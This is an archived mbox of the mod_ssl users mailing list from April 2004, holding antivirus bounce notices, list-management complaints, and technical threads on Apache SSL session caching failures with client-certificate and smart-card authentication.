	by master.modssl.org (Postfix) with ESMTP id 39960A8A4D
	for ; Thu,  1 Apr 2004 16:53:24 +0200 (CEST)
Received: from npri54exc23.npt.nuwc.navy.mil
 (NPRI54EXC23.NPT.NUWC.NAVY.MIL [129.190.70.168])
 by npri54mai01.npt.nuwc.navy.mil (PMDF V6.2-X17 #30632)
 with ESMTP id  for
 modssl-users-l@master.modssl.org; Thu,
 01 Apr 2004 09:53:15 -0500 (Eastern Standard Time)
Received: from NPRI54EXC23.NPT.NUWC.NAVY.MIL ([129.190.70.168])
 by npri54exc23.npt.nuwc.navy.mil with SMTP
 (Microsoft Exchange Internet Mail Service Version 5.5.2657.72)
	id 2CXVXRH1; Thu, 01 Apr 2004 09:53:13 -0500
Date: Thu, 01 Apr 2004 09:53:06 -0500
From: TrendVirusWall23@nuwc.navy.mil
Subject: Content mail warning notification!
To: modssl-users-l@master.modssl.org
Message-id: 
MIME-version: 1.0
Content-type: multipart/mixed;
 boundary="----=_NextPart_000_1080831186_B78506032.R82506026"
InterScan-Notification: yes

This is a multi-part message in MIME format.

------=_NextPart_000_1080831186_B78506032.R82506026
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

************* eManager Notification **************

Due to a restricted file type, Trend Virus Detector [23] has replaced the attachment with e-mail header information.

Source mailbox: "owner-mmx-modssl-users@mmx.engelschall.com"
Destination mailbox(es): "modssl-users-l@master.modssl.org"

******************* End of message *******************

------=_NextPart_000_1080831186_B78506032.R82506026
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

Received: from 164.223.1.101 by npri54exc23.npt.nuwc.navy.mil (InterScan E-Mail VirusWall NT); Thu, 01 Apr 2004 09:53:05 -0500
Received: from mmx.engelschall.com (mmx.engelschall.com [195.27.130.252])
 by npri54mai02.npt.nuwc.navy.mil (PMDF V6.2-X17 #30632)
 with ESMTP id  for
 fariast@npt.nuwc.navy.mil; Thu,
 01 Apr 2004 09:52:59 -0500 (Eastern Standard Time)
Received: by mmx.engelschall.com (Postfix)	id EBDD01939B; Thu,
 01 Apr 2004 16:49:17 +0200 (CEST)
Received: from master.modssl.org (unknown [195.27.176.156])
	by mmx.engelschall.com (Postfix) with ESMTP id C873A1939A	for
 ; Thu, 01 Apr 2004 16:49:17 +0200 (CEST)
Received: by master.modssl.org (Postfix)	id 763FEA8A4D; Thu,
 01 Apr 2004 16:49:21 +0200 (CEST)
Received: from pop05.wanadoo.nl (pop05.wanadoo.nl [194.134.35.180])
	by master.modssl.org (Postfix) with ESMTP id 7340FA8A51	for
 ; Thu, 01 Apr 2004 16:49:05 +0200 (CEST)
Received: by pop05.wanadoo.nl (Postfix)	id A80BF1BB86; Thu,
 01 Apr 2004 16:49:04 +0200 (CEST)
Date: Thu, 01 Apr 2004 16:49:04 +0200 (CEST)
From: MAILER-DAEMON@pop05.wanadoo.nl (Mail Delivery System)
Subject: Undelivered Mail Returned to Sender
To: modssl-users-l@master.modssl.org
Message-id: <20040401144904.A80BF1BB86@pop05.wanadoo.nl>
MIME-version: 1.0
Content-type: multipart/report;
 boundary="523991BB64.1080830944/pop05.wanadoo.nl"; report-type=delivery-status
Delivered-to: modssl-users-l@master.modssl.org

------=_NextPart_000_1080831186_B78506032.R82506026--

From MAILER-DAEMON@polito.it  Thu Apr  1 16:55:28 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from polito.it (anacreon.polito.it [130.192.3.82])
	by master.modssl.org (Postfix) with ESMTP id 85CC3A8938
	for ; Thu,  1 Apr 2004 16:55:27 +0200 (CEST)
Sender: 
Date: Thu, 01 Apr 2004 16:55:23 +0200
Message-ID: 
X-Autogenerated: React
From: ANTIVIRUS-SYSTEM@polito.it
To: modssl-users-l@master.modssl.org
Subject: Attenzione Virus - Virus Alert 

*********************************************************
                  V I R U S - A L E R T
                    Servizio Antivirus
           (Ce.S.I.T. - Politecnico di Torino)
*********************************************************
  IL PRESENTE MESSAGGIO VIENE INVIATO AUTOMATICAMENTE
   non e' necessario rispondere a tale segnalazione.
*********************************************************

Un messaggio in arrivo e` stato eliminato dai sistemi di protezione
installati sui server di posta elettronica d'Ateneo.

Mittente:  MAILER-DAEMON@pop05.wanadoo.nl (Mail Delivery System)  (presumibilmente falsificato)
Oggetto:  Undelivered Mail Returned to Sender
---------------------------------------------------------

On Thu,  1 Apr 2004 16:49:04 +0200 (CEST) 
a message which was sent to you was discarded by Antivirus 
Service on our domain server.
 
Sender:   MAILER-DAEMON@pop05.wanadoo.nl (Mail Delivery System)  (may be faked)
Subject:  Undelivered Mail Returned to Sender

*********************************************************
 Cos'e' un Virus - Non voglio ricevere questo messaggio
                    Qui le risposte
        https://mail.polito.it/Files/antivirus.htm
*********************************************************

From Mauricio.Hollo@locaweb.com.br  Thu Apr  1 16:58:56 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from hm61.locaweb.com.br (hm61.locaweb.com.br [200.213.197.161])
	by master.modssl.org (Postfix) with SMTP id 29475A8A51
	for ; Thu,  1 Apr 2004 16:58:39 +0200 (CEST)
Received: (qmail 26209 invoked from network); 1 Apr 2004 14:58:20 -0000
Received: from unknown (HELO servnotes@notes.locaweb.com.br) (200.234.206.21)
  by hm61.locaweb.com.br with SMTP; 1 Apr 2004 14:58:20 -0000
From: Mauricio.Hollo@locaweb.com.br
X-Priority: 3 (Normal)
Date: Thu, 1 Apr 2004 12:00:30 -0300
Subject: Virus Found in message "Re: Question"
To: modssl-users-l@master.modssl.org
Message-ID: 
X-MIMETrack: Serialize by Router on servnotes/Locaweb(Release 5.0.8 |June 18, 2001) at
 01/04/2004 11:57:13
MIME-Version: 1.0
Content-type: text/plain; charset=us-ascii

Norton AntiVirus found a virus in an attachment you
(modssl-users-l@master.modssl.org) sent to robian@wanadoo.nl.



To ensure the recipient(s) are able to use the files you sent, perform a
virus scan on your computer, clean any infected files, then resend this
attachment.




Attachment:  sample01.zip

Virus name: W32.Netsky.P@mm

Action taken:  Clean failed : Quarantine succeeded :

File status:  Infected






From ste@smxy.org  Thu Apr  1 17:01:54 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from peter.smxy.org (smxy.org [64.32.179.41])
	by master.modssl.org (Postfix) with ESMTP id EBE36A8940
	for ; Thu,  1 Apr 2004 17:01:38 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by peter.smxy.org (Postfix) with ESMTP id 2509F20DC
	for ; Thu,  1 Apr 2004 10:01:34 -0500 (EST)
Received: from smxy.org ([127.0.0.1])
 by localhost (peter.smxy.org [127.0.0.1]) (amavisd-new, port 10025)
 with ESMTP id 07633-04 for ;
 Thu,  1 Apr 2004 10:01:33 -0500 (EST)
Received: from smxy.org (bgp377940bgs.plnfld01.nj.comcast.net [68.36.5.198])
	(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
	(No client certificate requested)
	by peter.smxy.org (Postfix) with ESMTP
	for ; Thu,  1 Apr 2004 10:01:33 -0500 (EST)
Message-ID: <406C2ECD.5040303@smxy.org>
Date: Thu, 01 Apr 2004 10:01:33 -0500
From: "Shaun T. Erickson" 
Reply-To: ste@smxy.org
User-Agent: Mozilla Thunderbird 0.5 (Windows/20040207)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users-l@master.modssl.org
Subject: Would someone stop the viruses, please!
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: by amavisd-new at smxy.org

I'm getting really tired of having viruses sent to me from this list. 
Put a virus scanner on it, will you?

	-ste

From jhallgren@ghweb.com  Thu Apr  1 17:21:45 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from corb.mc.mpls.visi.com (corb.mc.mpls.visi.com [208.42.156.1])
	by master.modssl.org (Postfix) with ESMTP id D0AEBA8938
	for ; Thu,  1 Apr 2004 17:21:44 +0200 (CEST)
Received: from [10.1.100.217] (216-54-189-117.gen.twtelecom.net [216.54.189.117])
	(using TLSv1 with cipher RC4-SHA (128/128 bits))
	(No client certificate requested)
	by corb.mc.mpls.visi.com (Postfix) with ESMTP
	id E16598576; Thu,  1 Apr 2004 09:21:39 -0600 (CST)
In-Reply-To: <20040331193255.GA57722@engelschall.com>
References: <200403311922.35778@prules> <000b01c41748$320837a0$6901a8c0@t20> <20040331193255.GA57722@engelschall.com>
Mime-Version: 1.0 (Apple Message framework v613)
Content-Type: text/plain; charset=US-ASCII; format=flowed
Message-Id: <44AF0C59-83F0-11D8-B7DD-000A95C4667C@ghweb.com>
Content-Transfer-Encoding: 7bit
Cc: rse@engelschall.com
From: Jeff Hallgren 
Subject: Re: A suggestion
Date: Thu, 1 Apr 2004 09:21:37 -0600
To: modssl-users-l@master.modssl.org
X-Mailer: Apple Mail (2.613)

Yeah... that must be it. Its all our fault for being clueless and de 
nile is not just a river in egypt.

So maybe I've finally been removed from the
modssl-users@modssl.org mailing list (doubtful) I've tried the 
majordomo interface "unsubscribe" for every email address I've ever had 
- including the one in the email headers of the modssl email I receive 
(imagine that). Your assertion that its my fault for not remembering 
what email address I subscribed under is insulting.

What is this?
modssl-users-l@master.modssl.org

How do I get off the modssl-users-l list? How many duplicate lists are 
there?
I never signed up for it, there is no mechanism to get off.

Please consider Cliff Woolley's generous offer to host the list(s) at 
apache.org.
Jeff


On Mar 31, 2004, at 1:32 PM, Ralf S. Engelschall wrote:

> The web interface had a bug. I've fixed it and it should now work 
> again.
> The email interface to Majordomo is not broken AFAIK. There are plenty
> of people successfully subscribing and unsubscribing from the list. The
> reason why people will have problems to unsubscribe is because they
> subscribed under a different email address than the one under which
> they try to unsubscribe. For instance I search for four people on the
> previous thread which wanted to unsubscribe and only one I was able to
> find (I tried all forms of substrings of their name, email address,
> etc).
>
> The others definetely have subscribed under totally different addresses
> and until they tell Majordomo or me what address this was, there is no
> chance to unsubscribe them, of course. But please stop complaining on
> the list. Contact me personally and tell me all your email addresses
> you used in the past and I will try to remove all of them from the list
> manually.
>
>                                        Ralf S. Engelschall
>                                        rse@engelschall.com
>                                        www.engelschall.com


From dufresne@sysinfo.com  Thu Apr  1 17:54:26 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [209.170.144.33])
	by master.modssl.org (Postfix) with ESMTP id 2FC4FA8938
	for ; Thu,  1 Apr 2004 17:54:08 +0200 (CEST)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id KAA17874;
	Thu, 1 Apr 2004 10:54:18 -0500
Date: Thu, 1 Apr 2004 10:54:17 -0500 (EST)
From: "R. DuFresne" 
To: "Shaun T. Erickson" 
Cc: modssl-users-l@master.modssl.org
Subject: Re: Would someone stop the viruses, please!
In-Reply-To: <406C2ECD.5040303@smxy.org>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

On Thu, 1 Apr 2004, Shaun T. Erickson wrote:

> I'm getting really tired of having viruses sent to me from this list. 
> Put a virus scanner on it, will you?
> 
> 	-ste
> 


Actually, the viruses are less a pain then all the AV products spewing
their marketing garbage back to the list each time some spoofed virus
makes  the list.  It's a 10-1 increase in bandwidth with each spoofed
virus/trojan sent.  So many folks are hitting my procmail filters merely
due to their AV products inability to properly handle the point.  Folks
need to turn these off.

Thanks,


Ron DuFresne
-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!


From owner-modssl-users@modssl.org  Fri Apr  2 16:53:22 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 44443A8939; Fri,  2 Apr 2004 16:53:22 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from lak-sf-04.lackland.af.mil (lak-sf-04.lackland.af.mil [137.242.1.26])
	by master.modssl.org (Postfix) with ESMTP id 4D8E9A893D
	for ; Fri,  2 Apr 2004 16:53:05 +0200 (CEST)
Received: from LAKMR003.lackland.af.mil (LAKMR003.lackland.af.mil [137.242.12.203])
	by lak-sf-04.lackland.af.mil with SMTP id i32FIvVl006774
	for ; Fri, 2 Apr 2004 09:19:09 -0600 (CST)
Received: from fsmpls06.lackland.af.mil ([137.242.51.69])
 by LAKMR003.lackland.af.mil (SAVSMTP 3.0.1.45) with SMTP id M2004040208484811413
 for ; Fri, 02 Apr 2004 08:48:48 -0600
Received: by fsmpls06 with Internet Mail Service (5.5.2657.72)
	id ; Fri, 2 Apr 2004 08:53:01 -0600
Message-ID: 
From: Loyless Jerrod A Contr ESC/NI7S1 
To: "'modssl-users@modssl.org'" 
Subject: Problems with SSLSessionCache
Date: Fri, 2 Apr 2004 08:52:59 -0600 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2657.72)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C418C2.055B0F55"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Loyless Jerrod A Contr ESC/NI7S1 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C418C2.055B0F55
Content-Type: text/plain


> I am getting the following message each time my server tries to cache a
> session id in my dbm file:
> 
> [31/Mar/2004 16:03:34 01122] [trace] Inter-Process Session Cache:
> request=SET status=BAD
> id=E05AA054474E712D1E59220EE8A07E46523457EC557ACF1730DB2B319931C106
> timeout=1199s (session caching)
> 
> I know I haven't given much information, but any ideas?
> 
> I also get this when it tries to reuse a session:
> 
> [31/Mar/2004 16:03:27 01120] [trace] Inter-Process Session Cache:
> request=GET status=MISSED
> id=6E353CAC3C6970AA0EC526304B7DBC97A6CC1451C014B39F9276342D1B870970
> (session renewal)
> 
	This only occurs when I turn on client authentication.  It works
fine with plain ssl.

	Jerrod

------_=_NextPart_001_01C418C2.055B0F55
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable






Problems with SSLSessionCache





    

    I am getting the following message =
each time my server tries to cache a session id in my dbm file:

    


    [31/Mar/2004 16:03:34 01122] =
[trace] Inter-Process Session Cache: request=3DSET status=3DBAD =
id=3DE05AA054474E712D1E59220EE8A07E46523457EC557ACF1730DB2B319931C106 =
timeout=3D1199s (session caching)
    


    I know I haven't given much =
information, but any ideas?

    


    I also get this when it tries to reuse =
a session:

    


    [31/Mar/2004 16:03:27 01120] =
[trace] Inter-Process Session Cache: request=3DGET status=3DMISSED =
id=3D6E353CAC3C6970AA0EC526304B7DBC97A6CC1451C014B39F9276342D1B870970 =
(session renewal)
    


    This only occurs =
when I turn on client authentication.  It works fine with plain =
ssl.

    


    Jerrod

    




------_=_NextPart_001_01C418C2.055B0F55--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr  2 17:51:30 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E889FA893D; Fri,  2 Apr 2004 17:51:29 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from relay3.mail2web.com (relay3.mail2web.com [168.144.1.83])
	by master.modssl.org (Postfix) with ESMTP id 325AFA8934
	for ; Fri,  2 Apr 2004 17:51:13 +0200 (CEST)
Received: from M2W043.mail2web.com ([168.144.251.149]) by relay3.mail2web.com with Microsoft SMTPSVC(5.0.2195.6713);
	 Fri, 2 Apr 2004 10:51:07 -0500
Message-ID: <191690-2200445215517911@M2W043.mail2web.com>
X-Priority: 3
X-Originating-IP: 137.242.1.50
X-URL: http://mail2web.com/
From: "rlabbe@satx.rr.com" 
To: modssl-users@modssl.org
Subject: Apache Session Reuse with Client Authentication -- Smart Card
Date: Fri, 2 Apr 2004 10:51:07 -0500
MIME-Version: 1.0
Content-type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable
X-OriginalArrivalTime: 02 Apr 2004 15:51:07.0903 (UTC) FILETIME=[5011F0F0:01C418CA]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "rlabbe@satx.rr.com" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,=20

Question:=20

Software:=20
Apache 1=2E3=2E29=20
ModSSL 2=2E8=2E16=20
OpenSSL 0=2E9=2E7c=20
OS Sun Solaris 8=20
Clients=20
IE 5=2E5 and IE 6=2E0=20

Client Certificates stored on hardware token with 10 minute timeout for=20=

private key=2E If a user does not use the private key for 10 minutes, then=
=20
he/she has to re-enter PIN to access private key stored on smart card=2E=20=



If I set Apache to not require client authentication then I am=20
able to reuse a SSL session ID when connecting via HTTPS=2E I ran the=20
following test with openssl:=20

openssl s_client -connect localhost:443 -state -reconnect=20

The results basically inform you that session caching is working properly=20=

and openssl connects to Apache using the same session ID 5 times=2E=20

If I modify the httpd=2Econf file to require client authentication, I get =
a=20
failure with the above openssl command and when connecting using a=20
certificate=2E I get REQUEST=3DSET STATUS=3DBAD when OpenSSL is trying to=20=

write the session id to the DBM cache file on the local system=2E OpenSSL=20=

then attempts to REQUEST=3DGET and that fails when it tries to use the=20
session ID it was unable to write earlier=2E=20

If I remove the require client auth in the httpd=2Econf file, the logging =
is=20
correct and the openssl command does not fail=2E=20

The problem is that I have users that may take longer than 10 minutes=20
(Access to private key on smart card timeout after 10 minutes) to complete=
=20
a form on a web page=2E If a user accesses the server via the browser, he/=
she=20
selects a certificate to present, authenticates to smart card with pin and=
=20
is then allowed access to the web page=2E If he/she sits there with the=20=

browser open for 12 minutes or so and click on a link -- failure=2E Page n=
ot=20
found failure=2E I look at the debug logs of SSL and see that=20
OpenSSL was trying to reuse the first session key and it failed=2E As a=20=

result, the complete handshake starts over again, but the user is not=20
prompted to enter PIN=2E Apache does not get a user cert and failure takes=
=20
place=2E=20

The ironic thing is that if I wait 12 minutes, enter PIN for smart card=20=

prior to clicking on a link, then all works fine=2E OpenSSL does not reuse=
=20
the session key, but the repeat of the handshake works=2E=20

How am I able to configure Apache to reuse the session key when client aut=
h=20
is enabled? Am I missing something?=20

Thanks=20


--------------------------------------------------------------------
mail2web - Check your email from the web at
http://mail2web=2Ecom/ =2E


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr  2 17:56:13 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 6E290A893D; Fri,  2 Apr 2004 17:56:13 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mailer.i3link.com (mailer.i3link.com [207.49.60.200])
	by master.modssl.org (Postfix) with SMTP id A2490A8978
	for ; Fri,  2 Apr 2004 17:55:54 +0200 (CEST)
Received: (qmail 6687 invoked by uid 508); 2 Apr 2004 14:36:17 -0000
Message-ID: <20040402143617.6686.qmail@mailer.i3link.com>
From: keven.jones@i3link.com
To: modssl-users@modssl.org
Subject: Problem with upgrade
Date: Fri, 02 Apr 2004 14:36:17 GMT
Mime-Version: 1.0
Content-Type: text/plain; format=flowed; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: keven.jones@i3link.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi, 

I downloaded the openssl-0.6 package from sunfreeware and installed
the package. I then copied the .so files to my /apache/libexec dir
but it complains that libssl.so.0.9.6 can't be found and it is in the 
libexec directory. Thus I am unable to startssl. 

Anyone know what I am doing wrong? 

thx 

Keven E. Jones
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr  2 18:31:02 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id DFA78A8978; Fri,  2 Apr 2004 18:31:02 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cyrus.vandervecken.com (cyrus.vandervecken.com [64.124.43.248])
	by master.modssl.org (Postfix) with ESMTP id DDF76A897A
	for ; Fri,  2 Apr 2004 18:30:42 +0200 (CEST)
Received: from geoff by cyrus.vandervecken.com with local (Exim 3.35 #1 (Debian))
	id 1B9RYt-0002wp-00; Fri, 02 Apr 2004 08:30:31 -0800
From: Geoff Thorpe 
To: modssl-users@modssl.org
Subject: Re: Problems with SSLSessionCache
Date: Fri, 2 Apr 2004 11:29:56 -0500
User-Agent: KMail/1.6.1
References: 
In-Reply-To: 
MIME-Version: 1.0
Content-Disposition: inline
Content-Type: text/plain;
  charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-Id: <200404021129.57443.geoff@geoffthorpe.net>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoff Thorpe 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On April 2, 2004 09:52 am, Loyless Jerrod A Contr ESC/NI7S1 wrote:
> > I am getting the following message each time my server tries to cache
> > a session id in my dbm file:
> >
> > [31/Mar/2004 16:03:34 01122] [trace] Inter-Process Session Cache:
> > request=SET status=BAD
> > id=E05AA054474E712D1E59220EE8A07E46523457EC557ACF1730DB2B319931C106
> > timeout=1199s (session caching)
> >
> > I know I haven't given much information, but any ideas?
> >
> > I also get this when it tries to reuse a session:
> >
> > [31/Mar/2004 16:03:27 01120] [trace] Inter-Process Session Cache:
> > request=GET status=MISSED
> > id=6E353CAC3C6970AA0EC526304B7DBC97A6CC1451C014B39F9276342D1B870970
> > (session renewal)
>
> 	This only occurs when I turn on client authentication.  It works
> fine with plain ssl.

That would indicate (probably) that the session is too big, as they 
include client certs in when client-auth is being used. You didn't 
mention which session cache type you're using - what's the 
SSLSessionCache directive in your config? Also, if you run with tracing 
on and you get a "GET/MISSED", can you check backwards from there for a 
log message with the same id byte-string, hopefully it's a "PUT/MISSED" 
or something like that, indicating that the session store failed.

Cheers,
Geoff

-- 
Geoff Thorpe
geoff@geoffthorpe.net
http://www.geoffthorpe.net/

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr  2 19:37:33 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C73BDA8978; Fri,  2 Apr 2004 19:37:33 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from alpha2.AXP.MDX.AC.UK (alpha2.axp.mdx.ac.uk [158.94.0.14])
	by master.modssl.org (Postfix) with ESMTP id A06DFA8939
	for ; Fri,  2 Apr 2004 19:37:17 +0200 (CEST)
Date: Fri, 02 Apr 2004 17:40:57 +0000
From: a.moon@mdx.ac.uk
Subject: Apache Session Reuse with Client Authentication -- Smart Card
To: modssl-users@modssl.org
Message-id: <587C7584201@mdx-bg-staff1.nw.mdx.ac.uk>
MIME-version: 1.0
Content-type: TEXT/PLAIN
Content-transfer-encoding: 7BIT
X-Autoreply-From: 
X-Comment: Middlesex University has scanned this message for viruses.
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: a.moon@mdx.ac.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I am away until the 14th April 2004
I will get back to you as soon as i can when I return.  
If the matter is urgent and concerns OASIS, MUBSWEB or MUBS Online 
then please contact one of the other members of the OLSU team who will try to help.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr  2 20:41:27 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D2E3CA8978; Fri,  2 Apr 2004 20:41:27 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from lak-sf-04.lackland.af.mil (lak-sf-04.lackland.af.mil [137.242.1.26])
	by master.modssl.org (Postfix) with ESMTP id AAB7CA8934
	for ; Fri,  2 Apr 2004 20:41:10 +0200 (CEST)
Received: from LAKMR003.lackland.af.mil (LAKMR003.lackland.af.mil [137.242.12.203])
	by lak-sf-04.lackland.af.mil with SMTP id i32J75Vj020855
	for ; Fri, 2 Apr 2004 13:07:14 -0600 (CST)
Received: from fsmpls06.lackland.af.mil ([137.242.51.69])
 by LAKMR003.lackland.af.mil (SAVSMTP 3.0.1.45) with SMTP id M2004040212365206024
 for ; Fri, 02 Apr 2004 12:36:52 -0600
Received: by fsmpls06 with Internet Mail Service (5.5.2657.72)
	id ; Fri, 2 Apr 2004 12:41:06 -0600
Message-ID: 
From: Loyless Jerrod A Contr ESC/NI7S1 
To: "'modssl-users@modssl.org'" 
Subject: RE: Problems with SSLSessionCache
Date: Fri, 2 Apr 2004 12:41:01 -0600 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2657.72)
Content-Type: text/plain
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Loyless Jerrod A Contr ESC/NI7S1 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


I am using SSLSessionCache dbm:/usr/local/apache/logs/ssl_cache.  The dbm
files are created but they remain empty when I attempt with client auth
turned on.  Where is the size limitation set on the caching of sessions?  I
do see the request=SET, status=BAD as you mentioned, which seems to indicate
that Apache is never able to write to the file.

Jerrod



-----Original Message-----
From: Geoff Thorpe [mailto:geoff@geoffthorpe.net] 
Sent: Friday, April 02, 2004 10:30 AM
To: modssl-users@modssl.org
Subject: Re: Problems with SSLSessionCache


On April 2, 2004 09:52 am, Loyless Jerrod A Contr ESC/NI7S1 wrote:
> > I am getting the following message each time my server tries to 
> > cache a session id in my dbm file:
> >
> > [31/Mar/2004 16:03:34 01122] [trace] Inter-Process Session Cache: 
> > request=SET status=BAD 
> > id=E05AA054474E712D1E59220EE8A07E46523457EC557ACF1730DB2B319931C106
> > timeout=1199s (session caching)
> >
> > I know I haven't given much information, but any ideas?
> >
> > I also get this when it tries to reuse a session:
> >
> > [31/Mar/2004 16:03:27 01120] [trace] Inter-Process Session Cache: 
> > request=GET status=MISSED 
> > id=6E353CAC3C6970AA0EC526304B7DBC97A6CC1451C014B39F9276342D1B870970
> > (session renewal)
>
> 	This only occurs when I turn on client authentication.  It works
fine 
> with plain ssl.

That would indicate (probably) that the session is too big, as they 
include client certs in when client-auth is being used. You didn't 
mention which session cache type you're using - what's the 
SSLSessionCache directive in your config? Also, if you run with tracing 
on and you get a "GET/MISSED", can you check backwards from there for a 
log message with the same id byte-string, hopefully it's a "PUT/MISSED" 
or something like that, indicating that the session store failed.

Cheers,
Geoff

-- 
Geoff Thorpe
geoff@geoffthorpe.net
http://www.geoffthorpe.net/

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From 6eLzI4YGk@mail.sysnet.net.tw  Fri Apr  2 21:19:53 2004
Return-Path: <6eLzI4YGk@mail.sysnet.net.tw>
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from xp (sw68-20-86.adsl.seed.net.tw [210.68.20.86])
	by master.modssl.org (Postfix) with SMTP id D7FDCA8939
	for ; Fri,  2 Apr 2004 21:19:19 +0200 (CEST)
Received: from tpts7
	by tpts7.seed.net.tw with SMTP id Kejc78AbEHasLKBCliUTP9E8f;
	Sat, 03 Apr 2004 03:19:42 +0800
Message-ID: 
From: ³Ð·N¥Í¬¡®a@master.modssl.org
To: oklist@master.modssl.org
Subject:=?big5?Q?=B4=D3=A7=F8=A8q=AAw=AAj=B9j=C2=F7=C1=F7UV17=B9q=A4l=B3=F8?=
MIME-Version: 1.0
Content-Type: multipart/related;
	type="multipart/alternative";
	boundary="----=_NextPart_IZOCGCeZKSN90hoH"
X-Mailer: jpQvXDr0b3gpQLv
X-Priority: 3
